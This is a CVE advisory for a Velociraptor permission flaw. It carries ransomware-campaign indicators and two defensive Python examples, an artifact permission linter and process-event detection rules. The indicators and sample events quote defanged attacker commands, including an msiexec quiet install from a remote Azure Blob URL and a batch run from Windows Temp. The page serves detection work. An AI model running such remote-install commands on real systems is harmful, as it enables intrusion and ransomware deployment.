CVE-2025-6264
published 2025-06-20


Priority: P1 (81) · Severity: medium, 5.5 (CVSS 3.1)
CVSS vector: AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L
Tags: ITW · VulnCheck KEV · Ransomware
Exploited in the wild
EPSS: 0.96% (57.2nd percentile)
Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions. To limit access to some dangerous artifacts, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with COLLECT_CLIENT permissions (normally given by the "Investigator" role) to collect it from endpoints and update the configuration. This can lead to arbitrary command execution and endpoint takeover. To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have the COLLECT_CLIENT given typically by the "Investigator" role).
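The gate the advisory describes is an artifact-level list of extra required permissions that the server checks on top of COLLECT_CLIENT before a collection is scheduled. The following is an added example, not Velociraptor's own code: it models that check and lints a set of artifact definitions for dangerous ones that an Investigator could still collect. The artifact texts are constructed and abridged (not the real artifact bodies), the Investigator role is modelled as holding only COLLECT_CLIENT, the `required_permissions` field name is taken from Velociraptor's artifact format, and the notion of "dangerous" (Admin.Client.* namespace or VQL calling execve()) is a heuristic of this example, not a project rule.

```python
"""Added example (not Velociraptor source): model the artifact permission gate
from the advisory and lint artifact definitions for dangerous ones that an
Investigator could still collect.  Assumptions: the Investigator role is
modelled as holding only COLLECT_CLIENT, the artifact texts are constructed
and abridged, and "dangerous" is a heuristic (Admin.Client.* namespace or VQL
that calls execve()), not a project rule."""
import re

INVESTIGATOR = {"COLLECT_CLIENT"}

# Constructed, abridged artifact definitions (not the real artifact bodies).
UNFIXED_ARTIFACT = """\
name: Admin.Client.UpdateClientConfig
description: Update the client's configuration (constructed, abridged).
sources:
  - query: |
      SELECT * FROM info()
"""

FIXED_ARTIFACT = """\
name: Admin.Client.UpdateClientConfig
description: Same artifact with the extra permission the fix requires.
required_permissions:
  - EXECVE
sources:
  - query: |
      SELECT * FROM info()
"""

SHELL_ARTIFACT = """\
name: Custom.Shell.Run
description: Constructed artifact that runs a command; correctly gated.
required_permissions:
  - EXECVE
sources:
  - query: |
      SELECT * FROM execve(argv=["whoami"])
"""

INFO_ARTIFACT = """\
name: Generic.Client.Info
description: Constructed benign artifact.
sources:
  - query: |
      SELECT * FROM info()
"""

PERMS_RE = re.compile(r"^required_permissions:\n((?:[ \t]+-[ \t]+\S+\n)+)", re.M)


def parse_artifact(text):
    """Pull name, required_permissions and raw text out of an artifact definition.
    Regex-based so the example needs no YAML library; enough for these fields."""
    name = re.search(r"^name:[ \t]*(\S+)", text, re.M).group(1)
    m = PERMS_RE.search(text)
    perms = set(re.findall(r"-[ \t]+(\S+)", m.group(1))) if m else set()
    return {"name": name, "required_permissions": perms, "text": text}


def is_dangerous(art):
    """Heuristic (assumption): client-control artifacts and anything calling execve()."""
    return art["name"].startswith("Admin.Client.") or bool(re.search(r"\bexecve\(", art["text"]))


def can_collect(user_perms, art):
    """Server-side gate as the advisory describes it: COLLECT_CLIENT plus every
    permission the artifact itself declares."""
    return "COLLECT_CLIENT" in user_perms and art["required_permissions"] <= user_perms


def lint(artifact_texts, role_perms=INVESTIGATOR):
    """Names of dangerous artifacts that a user holding role_perms could still collect."""
    return [a["name"] for a in map(parse_artifact, artifact_texts)
            if is_dangerous(a) and can_collect(role_perms, a)]


if __name__ == "__main__":
    # The unfixed definition is the only finding; the fixed one needs EXECVE.
    print(lint([UNFIXED_ARTIFACT, FIXED_ARTIFACT, SHELL_ARTIFACT, INFO_ARTIFACT]))
```

Running `lint` over a dump of your own custom artifacts is the check a Velociraptor admin would want after upgrading to 0.74.3: the fix covers the built-in artifact, but any locally written artifact that reaches the same functionality without `required_permissions` has the identical gap.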

Affected (2 ranges)

Vendor             | Product              | Version range   | Fixed in
rapid7             | velociraptor         | < 0.74.3        | 0.74.3
www.velocidex.com  | golang_velociraptor  | >= 0, < 0.74.3  | 0.74.3

Detection & IOCs (extracted from sources)

url: hxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi
command: msiexec /q /i hxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi
command: C:\Windows\System32\cmd.exe cmd.exe /Q /c cmd /c c:\windows\temp\1.bat /y 1> \Windows\Temp\suLGnR 2>&1
path: c:\windows\temp\1.bat
version: Velociraptor 0.73.4.0
  • Detect msiexec spawning with a remote Azure Blob Storage URL containing '/veeam/v2.msi' as the install source — this is the delivery mechanism for the malicious Velociraptor MSI.
  • Alert on Velociraptor process launching repeatedly on a host that has been network-isolated — actors relaunched the tool multiple times even after isolation.
  • Detect PowerShell scripts containing the RSA public key string 'tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+' — this is embedded in the fileless Warlock encryptor PowerShell script.
  • Monitor for Velociraptor artifact collection of 'Admin.Client.UpdateClientConfig' by users with only COLLECT_CLIENT / Investigator role — this is the exploited artifact that does not enforce the required EXECVE permission.
  • Alert on Visual Studio Code being downloaded and executed by Velociraptor client processes — threat actors leveraged this to create C2 tunnels.
  • Talos could not confirm whether CVE-2025-6264 was actively exploited in the campaign — the vulnerable version was present but exploitation was not definitively observed.
  • CVE-2025-6264 requires the attacker to already hold COLLECT_CLIENT permissions (Investigator role) — it is a privilege escalation within Velociraptor, not an unauthenticated entry point.
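The host-side detections in the list above, implemented as an added example over constructed Sysmon-style process-creation events. This is not code from the original page, from Talos or from the Velociraptor project: the event field names (ts, host, image, cmdline), the velociraptor.exe command line and the sample events are made up, and a host's network-isolation state is assumed to be supplied by the EDR as a set of host names rather than derived from the events themselves.

```python
"""Added example, not code from the original page, Talos or the Velociraptor
project: the host-side detections listed above, run over constructed
Sysmon-style process-creation events.  Assumptions: event field names
(ts, host, image, cmdline) and the velociraptor.exe command line are made up,
and a host's network-isolation state comes from the EDR as a set of host names."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

VELO = r"C:\Program Files\Velociraptor\Velociraptor.exe"

# Constructed events.  URLs are defanged exactly as in the IOC list above.
EVENTS = [
    {"ts": "2025-08-01T10:00:00", "host": "WS01", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i hxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi"},
    {"ts": "2025-08-01T10:00:05", "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c cmd /c c:\windows\temp\1.bat /y 1> \Windows\Temp\suLGnR 2>&1"},
    {"ts": "2025-08-01T10:01:00", "host": "WS01", "image": VELO, "cmdline": "velociraptor.exe service run"},
    {"ts": "2025-08-01T10:04:00", "host": "WS01", "image": VELO, "cmdline": "velociraptor.exe service run"},
    {"ts": "2025-08-01T10:09:00", "host": "WS01", "image": VELO, "cmdline": "velociraptor.exe service run"},
    {"ts": "2025-08-01T11:00:00", "host": "WS02", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /qn /i C:\installers\app.msi"},  # benign local install
    {"ts": "2025-08-01T11:05:00", "host": "WS02", "image": VELO, "cmdline": "velociraptor.exe service run"},
]


def refang(s):
    """Turn hxxps[:]//host[.]tld back into a parseable URL."""
    return s.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


URL_RE = re.compile(r"https?://([^/\s]+)(/\S*)?", re.I)


def remote_msi_installs(events):
    """msiexec started with a URL as its install source.  Returns
    (host, url-without-scheme, matches_campaign); matches_campaign is True for
    the Azure Blob '/veeam/v2.msi' delivery the IOCs describe."""
    hits = []
    for e in events:
        if not e["image"].lower().endswith("msiexec.exe"):
            continue
        m = URL_RE.search(refang(e["cmdline"]))
        if not m:
            continue
        netloc, path = m.group(1).lower(), (m.group(2) or "").lower()
        campaign = netloc.endswith(".blob.core.windows.net") and "/veeam/v2.msi" in path
        hits.append((e["host"], netloc + path, campaign))
    return hits


TEMP_BAT_RE = re.compile(r"\\windows\\temp\\[^\s\\]+\.bat", re.I)


def temp_bat_via_cmd(events):
    """cmd.exe running a batch file out of \\Windows\\Temp with output redirected
    to a file, the pattern in the second 'command' IOC."""
    hits = []
    for e in events:
        if not e["image"].lower().endswith("cmd.exe"):
            continue
        m = TEMP_BAT_RE.search(e["cmdline"])
        if m and ">" in e["cmdline"]:
            hits.append((e["host"], m.group(0)))
    return hits


def repeated_velociraptor_launches(events, isolated_hosts,
                                   window=timedelta(minutes=15), threshold=3):
    """Hosts where velociraptor.exe started `threshold` or more times inside `window`
    while the host was network-isolated (isolation state supplied by the caller)."""
    by_host = defaultdict(list)
    for e in events:
        if e["host"] in isolated_hosts and e["image"].lower().endswith("velociraptor.exe"):
            by_host[e["host"]].append(datetime.fromisoformat(e["ts"]))
    flagged = []
    for host, times in by_host.items():
        times.sort()
        # Any run of `threshold` consecutive starts that fits inside the window.
        if any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1)):
            flagged.append(host)
    return flagged


if __name__ == "__main__":
    print(remote_msi_installs(EVENTS))
    print(temp_bat_via_cmd(EVENTS))
    print(repeated_velociraptor_launches(EVENTS, isolated_hosts={"WS01"}))
```

The msiexec rule is split on purpose: any remote install source is worth a low-severity alert on its own, while the `/veeam/v2.msi` path on an Azure Blob host is the campaign-specific indicator and should page. The relaunch rule needs the isolation state from outside the process telemetry, which is why it is a parameter rather than something inferred from the events.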

CVSS provenance

nvd: v3.1, 5.5 MEDIUM, CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L
vulncheck: 5.5 MEDIUM